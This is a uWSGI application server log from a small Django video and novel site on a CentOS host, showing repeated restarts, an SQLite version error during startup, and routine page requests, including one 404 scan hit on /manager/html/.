[pid: 22484|app: -1|req: -1/45] 223.73.88.126 () {44 vars in 775 bytes} [Sat Jan  2 12:25:31 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22487|app: -1|req: -1/46] 223.73.88.126 () {42 vars in 684 bytes} [Sat Jan  2 12:25:31 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/47] 183.136.225.46 () {34 vars in 461 bytes} [Sat Jan  2 13:31:26 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/48] 183.136.225.46 () {36 vars in 544 bytes} [Sat Jan  2 13:31:47 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/49] 172.105.89.161 () {26 vars in 291 bytes} [Sat Jan  2 13:38:17 2021] GET /0bef => generated 21 bytes in 0 msecs (HTTP/1.0 500) 2 headers in 83 bytes (0 switches on core 0)
...brutally killing workers...
worker 1 buried after 1 seconds
worker 2 buried after 1 seconds
worker 3 buried after 1 seconds
worker 4 buried after 1 seconds
binary reloading uWSGI...
chdir() to /home/jerome/git/django_project
closing all non-uwsgi socket fds > 2 (max_fd = 100001)...
found fd 6 mapped to socket 0 (127.0.0.1:8001)
running /usr/local/bin/uwsgi
[uWSGI] getting INI configuration from web.ini
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 13:46:50 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 inherited INET address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x1505a90
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
Traceback (most recent call last):
  File "./django_project/wsgi.py", line 16, in <module>
    application = get_wsgi_application()
  File "/usr/local/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/usr/local/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/usr/local/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/usr/local/lib64/python3.6/site-packages/django/apps/config.py", line 211, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 2, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/options.py", line 206, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/usr/local/lib64/python3.6/site-packages/django/db/__init__.py", line 28, in __getattr__
    return getattr(connections[DEFAULT_DB_ALIAS], item)
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 214, in __getitem__
    backend = load_backend(db['ENGINE'])
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 70, in <module>
    check_sqlite_version()
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 67, in check_sqlite_version
    raise ImproperlyConfigured('SQLite 3.8.3 or later is required (found %s).' % Database.sqlite_version)
django.core.exceptions.ImproperlyConfigured: SQLite 3.8.3 or later is required (found 3.7.17).
unable to load app 0 (mountpoint='') (callable not found or import error)
*** no app loaded. going in full dynamic mode ***
*** uWSGI is running in multiple interpreter mode ***
gracefully (RE)spawned uWSGI master process (pid: 22482)
spawned uWSGI worker 1 (pid: 17446, cores: 2)
spawned uWSGI worker 2 (pid: 17447, cores: 2)
spawned uWSGI worker 3 (pid: 17448, cores: 2)
spawned uWSGI worker 4 (pid: 17449, cores: 2)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 14:45:39 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
setgid() to 1001
setuid() to 1001
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
probably another instance of uWSGI is running on the same address (127.0.0.1:8001).
bind(): Address already in use [core/socket.c line 769]
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:07:32 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
setgid() to 1001
setuid() to 1001
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x212df90
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x212df90 pid: 32573 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 32573)
spawned uWSGI worker 1 (pid: 32579, cores: 2)
spawned uWSGI worker 2 (pid: 32580, cores: 2)
spawned uWSGI worker 3 (pid: 32581, cores: 2)
spawned uWSGI worker 4 (pid: 32582, cores: 2)
[pid: 32579|app: 0|req: 1/1] 223.73.88.126 () {44 vars in 833 bytes} [Sat Jan  2 15:07:42 2021] GET / => generated 2584 bytes in 101 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 32579|app: 0|req: 2/2] 223.73.88.126 () {44 vars in 845 bytes} [Sat Jan  2 15:07:52 2021] GET /video/ => generated 13502 bytes in 19 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 1)
[pid: 32579|app: 0|req: 3/3] 223.73.88.126 () {44 vars in 845 bytes} [Sat Jan  2 15:08:01 2021] GET /noval/ => generated 2620 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
[pid: 32579|app: 0|req: 4/4] 223.73.88.126 () {44 vars in 845 bytes} [Sat Jan  2 15:08:06 2021] GET /novel/ => generated 6155 bytes in 1 msecs (HTTP/1.1 200) 3 headers in 110 bytes (1 switches on core 0)
[pid: 32579|app: 0|req: 5/5] 223.73.88.126 () {44 vars in 845 bytes} [Sat Jan  2 15:08:15 2021] GET /video/ => generated 13502 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
[pid: 32579|app: 0|req: 6/6] 223.73.88.126 () {44 vars in 859 bytes} [Sat Jan  2 15:12:44 2021] GET /video/type/6/ => generated 13943 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 1)
[pid: 32579|app: 0|req: 7/7] 223.73.88.126 () {46 vars in 949 bytes} [Sat Jan  2 15:12:46 2021] GET /video/type/7/?area=&year=&rating= => generated 13943 bytes in 14 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
[pid: 32579|app: 0|req: 8/8] 101.32.12.80 () {28 vars in 359 bytes} [Sat Jan  2 15:13:34 2021] GET /manager/html/ => generated 2641 bytes in 3 msecs (HTTP/1.0 404) 3 headers in 102 bytes (1 switches on core 1)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:32:10 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x1869040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x1869040 pid: 3581 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 3581)
spawned uWSGI worker 1 (pid: 3583, cores: 2)
spawned uWSGI worker 2 (pid: 3584, cores: 2)
spawned uWSGI worker 3 (pid: 3585, cores: 2)
spawned uWSGI worker 4 (pid: 3586, cores: 2)
[pid: 3583|app: 0|req: 1/1] 223.73.88.126 () {48 vars in 980 bytes} [Sat Jan  2 15:32:13 2021] GET /video/type/7/?area=&year=&rating= => generated 13943 bytes in 121 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:38:25 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x22ed040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x22ed040 pid: 4479 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 4479)
spawned uWSGI worker 1 (pid: 4481, cores: 2)
spawned uWSGI worker 2 (pid: 4482, cores: 2)
spawned uWSGI worker 3 (pid: 4483, cores: 2)
spawned uWSGI worker 4 (pid: 4484, cores: 2)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:45:32 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x25af040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x25af040 pid: 5443 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 5443)
spawned uWSGI worker 1 (pid: 5445, cores: 2)
spawned uWSGI worker 2 (pid: 5446, cores: 2)
spawned uWSGI worker 3 (pid: 5447, cores: 2)
spawned uWSGI worker 4 (pid: 5448, cores: 2)
[pid: 5445|app: 0|req: 1/1] 223.73.88.126 () {44 vars in 833 bytes} [Sat Jan  2 15:45:42 2021] GET / => generated 77 bytes in 103 msecs (HTTP/1.1 404) 3 headers in 100 bytes (1 switches on core 0)
[pid: 5445|app: 0|req: 2/2] 223.73.88.126 () {44 vars in 845 bytes} [Sat Jan  2 15:45:47 2021] GET /video/ => generated 13502 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 1)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:49:38 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x2554040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x2554040 pid: 6007 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 6007)
spawned uWSGI worker 1 (pid: 6009, cores: 2)
spawned uWSGI worker 2 (pid: 6010, cores: 2)
spawned uWSGI worker 3 (pid: 6011, cores: 2)
spawned uWSGI worker 4 (pid: 6012, cores: 2)
[pid: 6012|app: 0|req: 1/1] 223.73.88.126 () {46 vars in 876 bytes} [Sat Jan  2 15:49:43 2021] GET /video/ => generated 13502 bytes in 119 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:51:13 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x1f9e040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x1f9e040 pid: 6240 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 6240)
spawned uWSGI worker 1 (pid: 6242, cores: 2)
spawned uWSGI worker 2 (pid: 6243, cores: 2)
spawned uWSGI worker 3 (pid: 6244, cores: 2)
spawned uWSGI worker 4 (pid: 6245, cores: 2)
*** Starting uWSGI 2.0.19.1 (64bit) on [Sat Jan  2 15:51:59 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x11fb040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x11fb040 pid: 6376 (default app)
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 6376)
spawned uWSGI worker 1 (pid: 6378, cores: 2)
spawned uWSGI worker 2 (pid: 6379, cores: 2)
spawned uWSGI worker 3 (pid: 6380, cores: 2)
spawned uWSGI worker 4 (pid: 6381, cores: 2)
[pid: 6381|app: 0|req: 1/1] 223.73.88.126 () {46 vars in 876 bytes} [Sat Jan  2 15:52:04 2021] GET /video/ => generated 13502 bytes in 118 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
[pid: 6381|app: 0|req: 2/2] 223.73.88.126 () {40 vars in 685 bytes} [Sat Jan  2 15:54:24 2021] GET /video => generated 0 bytes in 1 msecs (HTTP/1.1 301) 3 headers in 112 bytes (1 switches on core 1)
[pid: 6378|app: 0|req: 1/3] 223.73.88.126 () {40 vars in 687 bytes} [Sat Jan  2 15:54:24 2021] GET /video/ => generated 13502 bytes in 119 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
[pid: 6381|app: 0|req: 3/4] 223.73.88.126 () {42 vars in 776 bytes} [Sat Jan  2 15:55:10 2021] GET /admin/ => generated 0 bytes in 8 msecs (HTTP/1.1 302) 5 headers in 153 bytes (1 switches on core 1)
[pid: 6380|app: 0|req: 1/5] 223.73.88.126 () {42 vars in 796 bytes} [Sat Jan  2 15:55:10 2021] GET /admin/login.html => generated 5722 bytes in 103 msecs (HTTP/1.1 200) 5 headers in 292 bytes (1 switches on core 0)
[pid: 6381|app: 0|req: 4/6] 223.73.88.126 () {50 vars in 1020 bytes} [Sat Jan  2 15:55:54 2021] POST /admin/login.html => generated 92 bytes in 3 msecs (HTTP/1.1 200) 3 headers in 108 bytes (1 switches on core 1)
[pid: 6380|app: 0|req: 2/7] 223.73.88.126 () {44 vars in 856 bytes} [Sat Jan  2 15:56:01 2021] GET /admin/register.html => generated 4483 bytes in 8 msecs (HTTP/1.1 200) 5 headers in 292 bytes (1 switches on core 1)
[pid: 6380|app: 0|req: 3/8] 223.73.88.126 () {42 vars in 790 bytes} [Sat Jan  2 15:56:24 2021] GET /video/type/1/ => generated 13928 bytes in 15 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 1)
[pid: 6378|app: 0|req: 2/9] 223.73.88.126 () {44 vars in 841 bytes} [Sat Jan  2 15:56:26 2021] GET /video/type/2/ => generated 12739 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 1)
[pid: 6381|app: 0|req: 5/10] 223.73.88.126 () {44 vars in 841 bytes} [Sat Jan  2 15:56:28 2021] GET /video/type/3/ => generated 12415 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 293 bytes (1 switches on core 0)
